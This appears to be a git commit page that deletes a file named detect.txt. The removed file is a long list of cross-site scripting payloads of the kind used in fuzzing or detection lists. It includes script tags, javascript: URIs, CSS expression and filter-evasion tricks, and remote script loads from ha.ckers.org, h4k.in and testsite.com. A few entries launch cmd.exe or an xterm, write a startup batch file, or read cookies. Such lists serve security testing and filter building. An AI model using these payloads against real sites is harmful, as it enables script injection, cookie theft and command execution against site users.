Delete detect.txt
parent
00d14b061d
commit
8a783e85ad
|
@ -1,227 +0,0 @@
|
|||
<script>alert('xss')</script>
|
||||
<script>alert(string.fromcharcode(88,83,83))</script>
|
||||
</title><script>alert(1)</script>
|
||||
'> <script>alert(3)</script>
|
||||
`> <script>alert(5)</script>
|
||||
> <script>alert(4)</script>
|
||||
</title><script>alert(1)</script>
|
||||
<<script>alert("xss");//<</script>
|
||||
>"'
|
||||
'';!--"<XSS>=&{()}
|
||||
*/a=eval;b=alert;a(b(/e/.source));/*
|
||||
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
|
||||
</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")>
|
||||
perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
|
||||
<DIV STYLE="background-image: url(http://ha.ckers.org/xss.js)">Div Body</DIV>
|
||||
alert(1)
|
||||
A=alert;A(1)
|
||||
+alert(0)+
|
||||
';//%0da=eval;b=alert;a(b(9));//
|
||||
a=1;a=eval;b=alert;a(b(11));//
|
||||
'};a=eval;b=alert;a(b(13));//
|
||||
1};a=eval;b=alert;a(b(14));//
|
||||
'];a=eval;b=alert;a(b(15));//
|
||||
1];a=eval;b=alert;a(b(17));//
|
||||
1;a=eval;b=alert;a(b(/c/.source));
|
||||
xyz onerror=alert(6);
|
||||
> XSS | Replacive Fuzzers
|
||||
>>This is a comment line to be changed in the future
|
||||
<img src=`x` onrerror= ` ;; alert(1) ` />
|
||||
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
|
||||
style=color: expression(alert(0));" a="
|
||||
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
|
||||
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
|
||||
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
|
||||
<IMG DYNSRC="javascript:alert('XSS');">
|
||||
<IMG LOWSRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
||||
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMGSRC="javascript:alert('XSS')">
|
||||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
||||
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
||||
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
|
||||
> XSS | Replacive Fuzzers
|
||||
>>This is a comment line to be changed in the future
|
||||
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
||||
<A HREF="http://google:ha.ckers.org">XSS</A>
|
||||
<A HREF="http://ha.ckers.org@google">XSS</A>
|
||||
<A HREF="//google">XSS</A>
|
||||
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
||||
y=<a>alert</a>;content[y](123)
|
||||
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
|
||||
with(document.__parent__)alert(1)
|
||||
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
|
||||
style=color: expression(alert(0));" a="
|
||||
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
|
||||
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
|
||||
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>
|
||||
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
|
||||
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
|
||||
'';!--"<script>alert(0);</script>=&{(alert(1))}
|
||||
</title><script>alert(1)</script>
|
||||
</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
|
||||
'';!--"<XSS>=&{()}
|
||||
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=`javascript:alert("XSS says, 'XSS'")`>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">",
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert(<WBR>'XSS');">
|
||||
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
|
||||
/XSS STYLE=xss:expression(alert('XSS'))>
|
||||
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
|
||||
XSS-STYLE=xss:e/**/xpression(alert('XSS'))>
|
||||
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
||||
"><script>alert('XSS')</script>
|
||||
<xml id=i><x><c><![cdata[<img src="javas]]><![cdata[cript:alert('xss');">]]></c></x></xml><span datasrc=#i datafld=c dataformatas=html>
|
||||
<xml id="xss"><i><b><img src="javas<!-- -->cript:alert('xss')"></b></i></xml><span datasrc="#xss" datafld="b" dataformatas="html"></span>
|
||||
<html><body><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributename="innerhtml" to="xss<script defer>alert('xss')</script>"> </body></html>
|
||||
<html xmlns:xss><?import namespace="xss" implementation="httP://ha.ckers.org/xss.htc"><xss:xss>xss</xss:xss></html>
|
||||
<xml src="httP://ha.ckers.org/xsstest.xml" id=i></xml><span datasrc=#i datafld=c dataformatas=html></span>
|
||||
<?xml version="1.0"?><html:html xmlns:html='httP://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
|
||||
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
|
||||
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
||||
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
||||
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
||||
<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;
|
||||
<body onload=a1={x:this.parent.document};a1.x.writeln(1);>
|
||||
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
|
||||
<body/s/onload=x={doc:parent.document};x.doc.writeln(1)
|
||||
<body/????$/onload=x={doc:parent[<5B>document<6E>]};x.doc.writeln(1)
|
||||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<!--#exec cmd=""/usr/X11R6/bin/xterm ?display 127.0.0.1:0 &""-->
|
||||
httP://aa"><script>alert(123)</script>
|
||||
httP://aa'><script>alert(123)</script>
|
||||
httP://aa<script>alert(123)</script>
|
||||
<SCRIPT>alert('XSS')</SCRIPT>
|
||||
<SCRIPT SRC=http://testsite.com/xss.js></SCRIPT>
|
||||
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<BGSOUND SRC="javascript:alert('XSS');">
|
||||
<BODY BACKGROUND="javascript:alert('XSS');">
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG DYNSRC="javascript:alert('XSS');">
|
||||
<IMG LOWSRC="javascript:alert('XSS');">
|
||||
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
||||
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
<LAYER SRC="http://testsite.com/scriptlet.html"></LAYER>
|
||||
<IMG SRC="livescript:[code]">
|
||||
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
<IMG SRC="mocha:[code]">
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
<LINK REL="stylesheet" HREF="http://testsite.com/xss.css">
|
||||
<STYLE>@import'http://testsite.com/xss.css';</STYLE>
|
||||
<META HTTP-EQUIV="Link" Content="<http://testsite.com/xss.css>; REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://testsite.com/xssmoz.xml#xss")}</STYLE>
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
|
||||
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
|
||||
<HTML xmlns:xss> <?import namespace="xss" implementation="http://testsite.com/xss.htc"> <xss:xss>XSS</xss:xss> </HTML>
|
||||
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
|
||||
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
||||
<XML SRC="http://testsite.com/xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
|
||||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<XSS STYLE="behavior: url(http://testsite.com/xss.htc);">
|
||||
<SCRIPT SRC="http://testsite.com/xss.jpg"></SCRIPT>
|
||||
<BR SIZE="&{alert('XSS')}">
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
||||
<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " >
|
||||
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
|
||||
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
|
||||
<IMG SRC=" &#14; javascript:alert('XSS');">
|
||||
<SCRIPT/XSS SRC="http://testsite.com/xss.js"></SCRIPT>
|
||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
<SCRIPT SRC=http://testsite.com/xss.js
|
||||
<SCRIPT SRC=//testsite.com/.j>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<IFRAME SRC=http://testsite.com/scriptlet.html <
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
|
||||
<P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">
|
||||
<SCRIPT a=">" SRC="http://testsite.com/xss.js"></SCRIPT>
|
||||
<SCRIPT ="blah" SRC="http://testsite.com/xss.js"></SCRIPT>
|
||||
<SCRIPT a="blah" '' SRC="http://testsite.com/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://testsite.com/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://testsite.com/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://testsite.com/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">'>" SRC="http://testsite.com/xss.js"></SCRIPT>
|
Loading…
Reference in New Issue